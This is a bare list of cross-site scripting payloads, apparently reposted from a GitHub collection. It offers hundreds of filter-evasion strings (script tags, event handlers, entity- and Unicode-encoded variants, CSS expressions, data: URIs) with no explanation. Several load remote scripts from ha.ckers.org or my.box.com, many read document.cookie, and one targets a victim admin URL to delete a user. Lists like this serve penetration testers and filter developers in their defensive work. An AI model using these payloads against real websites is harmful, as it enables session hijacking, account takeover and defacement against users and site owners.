xss payloads



xss payloads

(from https://github.com/7ioSecurity/XSS-Payloads/blob/master/xss_payloads_2016)

<script>alert(123)</script>
<script>alert("hellox worldss");</script>
javascript:alert("hellox worldss")
<img src="javascript:alert('XSS');">
<img src=javascript:alert(&quot;XSS&quot;)>
<"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert("XSS");</script>&search=1
0&q=';alert(String.fromCharCode(88,83,83))//';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
<h1><font color=blue>hellox worldss</h1>
<BODY ONLOAD=alert('hellox worldss')>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(XSS)">lol
<!--<img src="--><img src=x onerror=alert(XSS)//">
<![><img src="]><img src=x onerror=alert(XSS)//">
<style><img src="</style><img src=x onerror=alert(XSS)//">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(123)</script>">
<div style="font-family:'foo&#10;;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
";alert('XSS');//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
&lt;INPUT TYPE="IMAGE" SRC="javascript&#058;alert('XSS');"&gt;
&lt;BODY BACKGROUND="javascript&#058;alert('XSS')"&gt;
&lt;BODY ONLOAD=alert('XSS')&gt;
&lt;IMG DYNSRC="javascript&#058;alert('XSS')"&gt;
&lt;IMG LOWSRC="javascript&#058;alert('XSS')"&gt;
&lt;BGSOUND SRC="javascript&#058;alert('XSS');"&gt;
&lt;BR SIZE="&{alert('XSS')}"&gt;
&lt;LAYER SRC="http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html"&gt;&lt;/LAYER&gt;
&lt;LINK REL="stylesheet" HREF="javascript&#058;alert('XSS');"&gt;
&lt;LINK REL="stylesheet" HREF="http&#58;//ha&#46;ckers&#46;org/xss&#46;css"&gt;
&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
&lt;META HTTP-EQUIV="Link" Content="&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet"&gt;
&lt;STYLE&gt;BODY{-moz-binding&#58;url("http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss")}&lt;/STYLE&gt;
&lt;XSS STYLE="behavior&#58; url(xss&#46;htc);"&gt;
&lt;STYLE&gt;li {list-style-image&#58; url("javascript&#058;alert('XSS')");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
&lt;IMG SRC='vbscript&#058;msgbox("XSS")'&gt;
&lt;IMG SRC="mocha&#58;&#91;code&#93;"&gt;
&lt;IMG SRC="livescript&#058;&#91;code&#93;"&gt;
žscriptualert(EXSSE)ž/scriptu
&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=javascript&#058;alert('XSS');"&gt;
&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;
&lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http&#58;//;URL=javascript&#058;alert('XSS');"
&lt;IFRAME SRC="javascript&#058;alert('XSS');"&gt;&lt;/IFRAME&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC="javascript&#058;alert('XSS');"&gt;&lt;/FRAMESET&gt;
&lt;TABLE BACKGROUND="javascript&#058;alert('XSS')"&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND="javascript&#058;alert('XSS')"&gt;
&lt;DIV STYLE="background-image&#58; url(javascript&#058;alert('XSS'))"&gt;
&lt;DIV STYLE="background-image&#58;07507206C028'06a06107606107306307206907007403a06106c065072074028&#46;1027058&#46;1053053027029'029"&gt;
&lt;DIV STYLE="background-image&#58; url(javascript&#058;alert('XSS'))"&gt;
&lt;DIV STYLE="width&#58; expression(alert('XSS'));"&gt;
&lt;STYLE&gt;@import'javascript&#58;alert("XSS")';&lt;/STYLE&gt;
&lt;IMG STYLE="xss&#58;expr/*XSS*/ession(alert('XSS'))"&gt;
&lt;XSS STYLE="xss&#58;expression(alert('XSS'))"&gt;
exp/*&lt;A STYLE='noxss&#58;noxss("*//*");
xss&#58;ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'&gt;
&lt;STYLE TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt;
&lt;STYLE&gt;&#46;XSS{background-image&#58;url("javascript&#058;alert('XSS')");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type="text/css"&gt;BODY{background&#58;url("javascript&#058;alert('XSS')")}&lt;/STYLE&gt;
&lt;!--&#91;if gte IE 4&#93;&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;!&#91;endif&#93;--&gt;
&lt;BASE HREF="javascript&#058;alert('XSS');//"&gt;
&lt;OBJECT TYPE="text/x-scriptlet" DATA="http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html"&gt;&lt;/OBJECT&gt;
&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
&lt;EMBED SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;swf" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;
&lt;EMBED SRC="data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;
a="get";
b="URL("";
c="javascript&#058;";
d="alert('XSS');")";
eval(a+b+c+d);
&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace="xss" implementation="http&#58;//ha&#46;ckers&#46;org/xss&#46;htc"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC="javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');"&gt;&#93;&#93;&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;XML ID="xss"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC="javas&lt;!-- --&gt;cript&#58;alert('XSS')"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;
&lt;XML SRC="xsstest&#46;xml" ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;HTML&gt;&lt;BODY&gt;
&lt;?xml&#58;namespace prefix="t" ns="urn&#58;schemas-microsoft-com&#58;time"&gt;
&lt;?import namespace="t" implementation="#default#time2"&gt;
&lt;t&#58;set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"&gt;
&lt;/BODY&gt;&lt;/HTML&gt;
&lt;SCRIPT SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg"&gt;&lt;/SCRIPT&gt;
&lt;!--#exec cmd="/bin/echo '&lt;SCR'"--&gt;&lt;!--#exec cmd="/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'"--&gt;
&lt;? echo('&lt;SCR)';
echo('IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'); ?&gt;
&lt;IMG SRC="http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode"&gt;
Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
&lt;META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
&lt;SCRIPT a="&gt;" SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT ="&gt;" SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a="&gt;" '' SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT "a='&gt;'" SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=`&gt;` SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a="&gt;'&gt;" SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;document&#46;write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;A HREF="http&#58;//66&#46;102&#46;7&#46;147/"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//1113982867/"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//0102&#46;0146&#46;0007&#46;00000223/"&gt;XSS&lt;/A&gt;
&lt;A HREF="htt	p&#58;//6	6&#46;000146&#46;0x7&#46;147/"&gt;XSS&lt;/A&gt;
&lt;A HREF="//www&#46;google&#46;com/"&gt;XSS&lt;/A&gt;
&lt;A HREF="//google"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//ha&#46;ckers&#46;org@google"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//google&#58;ha&#46;ckers&#46;org"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//google&#46;com/"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//www&#46;google&#46;com&#46;/"&gt;XSS&lt;/A&gt;
&lt;A HREF="javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'"&gt;XSS&lt;/A&gt;
&lt;A HREF="http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/"&gt;XSS&lt;/A&gt;
&lt;
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&lt;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
x3c
x3C
u003c
u003C
&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
&lt;IMG SRC="javascript&#058;alert('XSS')"
&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
&lt;SCRIPT/SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/&#124;&#93;^`=alert("XSS")&gt;
&lt;SCRIPT/XSS SRC="http&#58;//ha&#46;ckers&#46;org/xss&#46;js"&gt;&lt;/SCRIPT&gt;
&lt;IMG SRC="   javascript&#058;alert('XSS');"&gt;
perl -e 'print "&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;";' &gt; out
perl -e 'print "&lt;IMG SRC=javascript&#058;alert("XSS")&gt;";' &gt; out
&lt;IMG SRC="jav&#x0D;ascript&#058;alert('XSS');"&gt;
&lt;IMG SRC="jav&#x0A;ascript&#058;alert('XSS');"&gt;
&lt;IMG SRC="jav&#x09;ascript&#058;alert('XSS');"&gt;
&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
&lt;IMG SRC=javascript&#058;alert('XSS')&gt;
&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
&lt;IMG SRC=`javascript&#058;alert("RSnake says, 'XSS'")`&gt;
&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
&lt;IMG SRC=javascript&#058;alert('XSS')&gt;
&lt;IMG SRC="javascript&#058;alert('XSS');"&gt;
&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
'';!--"&lt;XSS&gt;=&{()}
';alert(String&#46;fromCharCode(88,83,83))//';alert(String&#46;fromCharCode(88,83,83))//";alert(String&#46;fromCharCode(88,83,83))//";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@import'javascript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A STYLE='noxss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja"";c="vascr";d="ipt:ale";e="rt('XSS');")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<!--<img src="--><img src=x onerror=alert(123)//">
<style><img src="</style><img src=x onerror=alert(123)//">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<script src="#">{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<svg xmlns="#"><script>alert(1)</script></svg>
<svg onload="javascript:alert(123)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo%00<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
<script>alert(1)</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
%u0025%u0075%u0066%u0066%u0031%u0063%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065%u0061%u006c%u0065%u0072%u0074%u0028%u0018%u0058%u0053%u0053%u0019%u0029%u003b%u0025%u0075%u0066%u0066%u0031%u0063%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065
%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
%uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
%uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
%uff02%uff1e
%uff02%uff1e%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
%uff02%uff1e%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
%uff02%uff1e%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
%uff02%uff1e%uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
%uff02%uff1e%uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
%uff02%uff1e%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
%u003cscript%u003ealert(XSS);%u003c/script%u003e
%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
%u003cscript%u003ealert%u00281uff09%u003b%u003c%uff0fscript%u003e
%u003cscript%u003ealert(1);%u003c/script%u003e
%u0022%u003e
%u0022%u003e%u003cscript%u003ealert(XSS);%u003c/script%u003e
%u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
%u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
%u0022%u003e%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
%u0022%u003e%u003cscript%u003ealert(1);%u003c/script%u003e
/"onafterscriptexecute=alert('XSS') 1='
Monday, June 5, 2017 by blast